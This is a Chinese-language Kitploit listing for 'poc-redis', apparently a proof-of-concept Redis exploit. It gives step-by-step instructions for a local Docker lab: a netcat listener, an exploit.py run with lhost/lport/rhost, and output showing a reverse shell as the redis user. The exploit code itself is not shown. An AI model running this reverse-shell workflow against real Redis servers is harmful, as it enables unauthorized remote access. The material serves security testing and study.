Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
poc-redis — 针对 Redis 漏洞的概念验证漏洞利用程序,可生成反向 Shell,并附带 Docker 与 netcat 监听器的设置说明。 | Kitploit
工具/GitHubGitHub/rop4sh/poc-redis
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubrop4sh/poc-redis

poc-redis

针对 Redis 漏洞的概念验证漏洞利用程序,可生成反向 Shell,并附带 Docker 与 netcat 监听器的设置说明。

查看仓库
18522年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

要运行该漏洞利用程序,请解压附带的 ZIP 文件,并在 Linux 上按照以下步骤操作:

  1. 设置虚拟环境/安装 Redis 客户端
root@kitploit:~
$ python3 -m venv .venv
$ source .venv/bin/activate
$ pip install -r requirements.txt
  1. 在另一个终端中,运行 Redis docker 镜像
    • 或者从源码构建并在受支持的平台上运行
      • 该漏洞利用程序已在 Fedora 40/Ubuntu 24.04 上测试并运行成功
root@kitploit:~
$ docker run -p6379:6379 redis:7.2.5
  1. 获取你的主机在 docker 网络上的 IP 地址
root@kitploit:~
$ ifconfig
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:53ff:fecc:6e16  prefixlen 64  scopeid 0x20<link>
        ether 02:42:53:cc:6e:16  txqueuelen 0  (Ethernet)
        RX packets 69  bytes 4268 (4.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 133  bytes 269173 (262.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

  1. 在另一个终端中,运行一个 netcat 监听器:
root@kitploit:~
$ nc -nlvp 2222
  1. 运行漏洞利用程序:
    • 将 lhost 替换为你的 docker 网络 IP 地址
root@kitploit:~
$ python3 exploit.py --lhost 172.17.0.1 --lport 2222 --rhost localhost
  1. 你应该会收到一个连接
root@kitploit:~
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:2222
Ncat: Listening on 0.0.0.0:2222
Ncat: Connection from 172.17.0.2:36518.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
redis@4d1537f2dd4e:/data$

下载工具